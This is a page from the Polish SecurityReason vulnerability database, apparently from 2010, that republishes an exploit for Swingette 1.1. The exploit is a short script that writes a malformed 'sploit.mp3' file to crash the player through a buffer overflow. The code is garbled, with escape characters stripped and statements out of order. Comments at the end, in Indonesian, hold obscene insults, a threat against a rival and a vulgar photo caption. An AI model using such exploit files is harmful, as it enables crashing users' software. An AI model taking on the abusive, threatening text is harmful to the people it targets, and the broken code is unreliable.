Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
Wiadomości IT
Dodaj wiadomość
Szukaj
Baza SecurityAlert
O SecurityAlert
Baza ExploitAlert
Badania SecurityReason
WLB
Baza WLB
Dodaj Note WLB
O WLB
Audyt
Informacje
Harmonogram
Cena
Referencje
Kontakt
RSS
Wiadomości
SecurityAlert
ExploitAlert
Apache
PHP
WLB
Zespół
Kontakt
Informacje o firmie
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl
Strona główna arrow Baza WLB          

  Tytuł : Swingette 1.1 buffer overflow denial of service
  WLB : WLB-2010030067  (Szczegóły)
  Data publikacji : 2010-03-16
  Autor          : Inj3ct0r
  Poziom ryzyka : Średni  Poziom Średni  (Szczegóły)
  Zdalny błąd : Nie
  Lokalny błąd : Tak
  Status   : Bład

  Historia :
[2010-03-16] Publikacja

  Podatne oprogramowanie :  

Swingette 1.1


  Tekst :  

# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' __ /'__` / __ /'__` 0
# 0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
# 1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
# 0 / / / / __/ _ _ / 1
# 1 _ _ __ ____/ ____\ __\ ____/ _ 0
# 0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
# 1 ____/ >> Exploit database separated by exploit 0
# 0 /___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#[+] Discovered By: cr4wl3r


print mp3
"x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x0
0x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x0
0x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x0
0x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x0
0x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x0
0x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x0
0".
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
print mp3 "x4Dx54x68x64";
open(mp3, ">sploit.mp3");


# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama
FO nya langsung. gw dapet apa???
# bukannya loe yang ngirim email ama FOnya buat ngelink web loe???
sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.
# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas
netek dari mak loe mau ngajak berantem???
# eh njink gw tau loe dimana skrng.
# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh???
yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe
minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.
# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga
usah belagu.

# Lame in Action:
http://photos-b.ak.fbcdn.net/hphotos-ak-snc3/hs028.snc3/11559_1259969493634
_1061556093_848543_5837025_n.jpg (emut nih kontol gw njink)




  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP
Apache rss
» 
Apache HTTP Server Denial
   of Service Vulnerability
» 
Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)
» 
Apache Continuum
   cross-site scripting
   vulnerability
» 
Apache Tomcat DoS
   Vulnerability
PHP rss
» 
PHP Hashtables Denial of
   Service
» 
PHP 5.3.6 multiple null
   pointer dereference
» 
PHP 5.3.6 ZipArchive
   invalid use glob(3)
» 
libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain
Copyright © SecurityReason. All Rights Reserved.